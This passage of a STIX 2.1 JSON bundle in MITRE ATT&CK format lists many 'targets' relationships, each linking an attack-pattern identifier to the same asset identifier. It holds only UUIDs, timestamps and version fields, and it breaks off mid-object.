"2024-07-01T10:37:15.828533", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--22522668-ddf6-470b-a027-9d6866679f67", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--07643b10-ec8b-4495-b41d-3081cfaabd2a", "created": "2024-07-01T10:37:15.828541", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828543", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b0b72d3d-7b3d-43ec-b81d-219f7ccef722", "created": "2024-07-01T10:37:15.828551", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828553", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--232a7e42-cd6e-4902-8fe9-2960f529dd4d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--95071430-2e07-4e55-958f-87c1124e9e74", "created": "2024-07-01T10:37:15.828560", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828563", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--42b854f1-b572-402d-a6c5-5b5e6917c1ce", "created": "2024-07-01T10:37:15.828570", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828573", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--44472ac2-b767-4c32-bac3-5d711bae45ad", "created": "2024-07-01T10:37:15.828581", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828583", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--24769ab5-14bd-4f4e-a752-cfb185da53ee", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--92024ba9-cd6a-4a75-a41c-ba1070a32f62", "created": "2024-07-01T10:37:15.828591", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828593", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--79f8e87e-db9f-4a44-8925-3773df14cd00", "created": "2024-07-01T10:37:15.828601", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828603", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--336decfb-a0e6-42dc-84de-6aa87594e818", "created": "2024-07-01T10:37:15.828610", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828612", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--28170e17-8384-415c-8486-2e6b294cb803", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--eaf781da-5765-4876-9ff0-2911561b1317", "created": "2024-07-01T10:37:15.828621", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828623", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--322c51b9-c16d-4cab-99ed-a9306a870290", "created": "2024-07-01T10:37:15.828631", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828633", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--29ba5a15-3b7b-4732-b817-65ea8f6468e6", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4eade342-8d61-40d1-bd3b-2a35e220da78", "created": "2024-07-01T10:37:15.828641", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828643", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3088a06e-2e12-4d26-b5b7-2dd09b0e0d09", "created": "2024-07-01T10:37:15.828651", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828653", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b9f5572f-3303-4821-b87a-ba66402d0124", "created": "2024-07-01T10:37:15.828661", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828663", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8f4a010f-2af8-4447-98f9-5a7857981ad7", "created": "2024-07-01T10:37:15.828671", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828673", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a44aa7af-df9a-40a9-b28c-95e34888dc0c", "created": "2024-07-01T10:37:15.828680", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828683", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--089e5637-5650-4900-8a26-9ab59d5e8270", "created": "2024-07-01T10:37:15.828691", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828693", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2cd950a6-16c4-404a-aa01-044322395107", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c7ca28d1-8eb0-451f-9fa5-4d2460e3baab", "created": "2024-07-01T10:37:15.828701", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828703", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ea0d017c-0095-4e4a-a81a-1af55f2a8dcd", "created": "2024-07-01T10:37:15.828711", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828713", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--90880c7d-93d6-4cb4-b5eb-68836c7035bc", "created": "2024-07-01T10:37:15.828721", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828723", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2f41939b-54c3-41d6-8f8b-35f1ec18ed97", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--beee8efb-877f-470b-9d0d-8398a44ede2e", "created": "2024-07-01T10:37:15.828730", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828733", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--27aa5960-9309-4fb0-b37b-908d77f92055", "created": "2024-07-01T10:37:15.828740", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828743", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--92d191dd-e222-4dd1-8b37-9a5f31146fc6", "created": "2024-07-01T10:37:15.828750", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828753", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--07097daa-4338-4a2f-ba83-22260d283472", "created": "2024-07-01T10:37:15.828761", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828763", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0cff03b1-a9fc-4821-96b2-6b4bef41949c", "created": "2024-07-01T10:37:15.828771", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828773", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4b711a7d-848f-4eed-ba38-253f0418b2d8", "created": "2024-07-01T10:37:15.828781", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828783", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b4b93319-1b2d-4abe-a607-ad12689696ff", "created": "2024-07-01T10:37:15.828791", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828793", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--72cb9bf1-e7c4-4961-ba56-c7afa5c43a26", "created": "2024-07-01T10:37:15.828801", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828803", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--80c1300a-a68d-46c2-9e05-45c0588065d4", "created": "2024-07-01T10:37:15.828811", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828813", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9595b7d5-9979-4bda-8f54-84abb5e4a23a", "created": "2024-07-01T10:37:15.828820", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828822", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--341e222a-a6e3-4f6f-b69c-831d792b1580", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--405849ec-044c-4441-a64d-41c690611949", "created": "2024-07-01T10:37:15.828830", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828832", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b654534a-121f-433a-97ad-9718a59fd906", "created": "2024-07-01T10:37:15.828840", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828842", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--45629161-7419-42c1-869e-685a4e6d6d55", "created": "2024-07-01T10:37:15.828850", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828852", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--34e793de-0274-4982-9c1a-246ed1c19dee", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--519dbc1a-a34a-41d4-aa22-3e4f4f8a97be", "created": "2024-07-01T10:37:15.828860", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828862", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--24e817a2-8d3a-425c-b80d-920828a0376d", "created": "2024-07-01T10:37:15.828870", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828872", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3c299888-fba0-40e8-94cd-0f5c25201b95", "created": "2024-07-01T10:37:15.828880", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828882", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--319007ab-1ade-4487-af0a-0a3c10850589", "created": "2024-07-01T10:37:15.828890", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828892", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c1259c77-2282-44b5-ae4d-96d70cb8cc81", "created": "2024-07-01T10:37:15.828900", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828902", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--356662f7-e315-4759-86c9-6214e2a50ff8", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--08ee1bad-0db7-45d3-89b5-cee1ca705935", "created": "2024-07-01T10:37:15.828909", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828911", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--48faf868-64c8-4342-b1d0-4dbad1ee8f34", "created": "2024-07-01T10:37:15.828919", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828921", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6beed921-5708-4d11-865d-2af4d803f6d8", "created": "2024-07-01T10:37:15.828929", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828931", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--26f52cf4-12c2-445f-98d5-3ea9a38f3f70", "created": "2024-07-01T10:37:15.828939", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828941", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": 